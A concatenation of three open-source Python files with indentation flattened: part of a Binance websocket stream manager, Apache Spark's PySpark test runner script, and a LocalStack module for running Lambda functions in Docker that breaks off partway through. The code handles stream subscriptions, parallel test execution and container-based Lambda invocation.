logger.info(f"BinanceWebSocketApiManager.stream_is_stopping({stream_id}){self.get_debug_log()}")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: str
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info(f"BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
f", " + str(markets) + f"){self.get_debug_log()} - started ... -")
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logger.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logger.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
Unsubscribe channels and/or markets to an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: str
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info(f"BinanceWebSocketApiManager.unsubscribe_from_stream(" + str(stream_id) + ", " + str(channels) +
f", " + str(markets) + f"){self.get_debug_log()} - started ... -")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon a specific stream has started
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from distutils.version import LooseVersion
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
for scala in ["2.11", "2.12"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
spark_args = [
"--conf", "spark.driver.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"--conf", "spark.executor.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
skipped_counts = 0
try:
per_test_output.seek(0)
# Here expects skipped test output from unittest when verbosity level is
# 2 (or --verbose option is enabled).
decoded_lines = map(lambda line: line.decode(), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... skipped ', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.4", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def _check_coverage(python_exec):
# Make sure if coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has coverage installed when 'COVERAGE_PROCESS_START'
# environmental variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, str]
context: LambdaContext
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[AdditionalInvocationOptions]:
"""Return additional invocation options for given Lambda invocation context."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
def get_from_event(event: Dict, key: str):
"""Retrieve a field with the given key from the list of Records within 'event'."""
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def is_python_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("python")
def _store_logs(
lambda_function: LambdaFunction, log_output: str, invocation_time=None, container_id=None
):
log_group_name = "/aws/lambda/%s" % lambda_function.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
inv_context = InvocationContext(
lambda_function, event=event, function_version=version, context=context
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(
sqs_queue_arn, event, e
)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext):
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
self.apply_plugin_patches(inv_context)
if inv_context.docker_flags and config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags}"
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
